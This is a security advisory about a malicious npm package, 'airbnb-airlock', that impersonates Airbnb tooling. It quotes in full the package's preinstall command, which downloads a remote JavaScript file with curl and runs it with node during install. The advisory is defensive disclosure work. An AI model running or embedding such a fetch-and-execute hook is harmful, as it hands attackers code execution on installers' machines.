airbnb-airlock @99.0.0
Vulnerability report · Last retrieved from osv.dev June 24, 2026 at 6:36 AM UTC
OSV ID
MAL-2026-6293
Ecosystem
npm
Summary
The package's preinstall lifecycle hook in package.json runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js , fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during npm install . The fetched content is mutable and entirely controlled by the operator of that domain — installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.
Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.